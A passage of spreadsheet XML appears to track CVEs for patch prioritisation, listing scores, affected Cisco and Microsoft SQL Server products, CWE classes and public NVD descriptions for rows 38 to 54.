The vulnerabilities tracked by CVE-2026-20336 are related to issues concerning improper control of a resource through its lifetime that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-664.</t>
        </is>
      </c>
      <c r="S37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20336</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20340</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr"/>
      <c r="Q38" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco Secure FMC Software could allow an authenticated, remote attacker to execute arbitrary commands at the&amp;nbsp;root privilege level.
This vulnerability is due to unsecured deserialization of web-management user-controlled data. An attacker could exploit this vulnerability by authenticating to the device and sending a crafted HTTP payload. A successful exploit could allow the attacker to save the crafted payload and then execute it on the underlying operating system as root.
To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Security Analyst (read-only).</t>
        </is>
      </c>
      <c r="S38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20340</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20344</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr"/>
      <c r="Q39" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco Secure FMC Software could allow an authenticated, remote attacker to perform a SQL injection attack against an affected device. To exploit this vulnerability, the attacker must have a valid account on the device with the role of Security Approver, Access Admin, or Network Admin.
This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to obtain any data from the database, obtain the session credentials of an authenticated Administrator, and take actions with administrative privileges on the affected device.</t>
        </is>
      </c>
      <c r="S39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20344</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20360</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr"/>
      <c r="Q40" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20360 are related to information exposure and insecure handling issues that are grouped under the Common Weakness Enumeration (CWE) CWE-200.</t>
        </is>
      </c>
      <c r="S40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20360</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20361</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr"/>
      <c r="Q41" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20361 are related to SQL injection issues that are grouped under the Common Weakness Enumeration (CWE) CWE-89.</t>
        </is>
      </c>
      <c r="S41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20361</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62706</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K42"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42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr"/>
      <c r="Q42" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66814</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr"/>
      <c r="Q43" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66818</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr"/>
      <c r="Q44" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66819</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr"/>
      <c r="Q45" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66820</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr"/>
      <c r="Q46" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67370</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr"/>
      <c r="Q47" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67373</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K48" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr"/>
      <c r="Q48" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67380</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K49" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr"/>
      <c r="Q49" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67381</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K50" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr"/>
      <c r="Q50" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67384</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr"/>
      <c r="Q51" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67385</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K52" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr"/>
      <c r="Q52" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67388</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr"/>
      <c r="Q53" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69860</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
